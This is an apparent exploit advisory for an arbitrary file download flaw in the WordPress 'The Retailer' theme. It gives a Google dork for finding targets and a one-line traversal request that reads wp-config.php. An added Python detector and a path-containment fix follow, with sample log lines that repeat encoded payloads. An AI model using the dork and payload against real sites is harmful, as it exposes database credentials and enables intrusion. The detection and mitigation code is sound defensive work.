
WordPress The Retailer theme Arbitrary File Download Vulnerability

Author: JK , Published: 15-09-2014
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : WordPress The Retailer theme Arbitrary File Download Vulnerability
# Author : JK
# Vendor Homepage : http://themeforest.net/item/the-retailer-retina-responsive-woocommerce-theme/4287447
# Risk : High
# Class: Remote
# Google Dork: inurl:/wp-content/themes/theretailer/
# Date: 05/09/2014
# Greetz to : All Egy-Shell Team Members
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++

PoC :
http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
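The PoC above is a directory-traversal request against the `revslider_show_image` AJAX action, where the `img` parameter is used as a file path without being confined to an allowed directory. As an added example that is not part of the advisory, the Python below does two defender-side things: it flags such requests in web-server access logs (catching percent- and double-encoded `..` as well), and it shows the path-containment check a patched handler should apply before reading a file. The log lines, client IPs and the upload root `/srv/example/uploads` are constructed for the example.

```python
import os
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); not from the advisory.
SAMPLE_LOGS = [
    '10.0.0.5 - - [15/Sep/2014:10:01:02 +0000] "GET /wordpress/wp-admin/admin-ajax.php'
    '?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [15/Sep/2014:10:01:05 +0000] "GET /wordpress/wp-admin/admin-ajax.php'
    '?action=revslider_show_image&img=..%252F..%252Fwp-config.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [15/Sep/2014:10:02:00 +0000] "GET /wordpress/wp-admin/admin-ajax.php'
    '?action=revslider_show_image&img=uploads/banner.jpg HTTP/1.1" 200 48122 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [15/Sep/2014:10:03:00 +0000] "GET /wordpress/index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

# Pulls the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')


def parse_request_path(line):
    m = REQUEST_RE.search(line)
    return m.group("path") if m else None


def is_traversal(value):
    """True if the parameter escapes a relative directory after full decoding."""
    decoded = value
    for _ in range(3):  # peel off repeated percent-encoding layers
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    normalized = decoded.replace("\\", "/")
    return ".." in normalized.split("/") or normalized.startswith("/")


def flag_revslider_requests(lines):
    """Return (client_ip, img_value) for admin-ajax requests using this action with a traversal payload."""
    hits = []
    for line in lines:
        path = parse_request_path(line)
        if not path:
            continue
        parts = urlsplit(path)
        if not parts.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        qs = parse_qs(parts.query, keep_blank_values=True)  # decodes one encoding layer
        if qs.get("action", [""])[0] != "revslider_show_image":
            continue
        for img in qs.get("img", []):
            if is_traversal(img):
                hits.append((line.split()[0], img))
    return hits


def resolve_under_root(root, requested):
    """Mitigation side: resolve the requested name and serve it only if it stays inside root.

    Returns the canonical path, or None when the request would escape the directory.
    """
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, requested))
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate


if __name__ == "__main__":
    for ip, img in flag_revslider_requests(SAMPLE_LOGS):
        print(f"traversal attempt from {ip}: img={img!r}")
    print(resolve_under_root("/srv/example/uploads", "../wp-config.php"))  # None
    print(resolve_under_root("/srv/example/uploads", "banner.jpg"))
```

The detector keys on the combination of endpoint, `action` value and a decoded `img` containing a `..` segment or an absolute path, which is specific enough to avoid alerting on ordinary slider image loads; `resolve_under_root` rejects `..`, absolute paths and symlink escapes uniformly by comparing canonical paths rather than by blacklisting characters.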
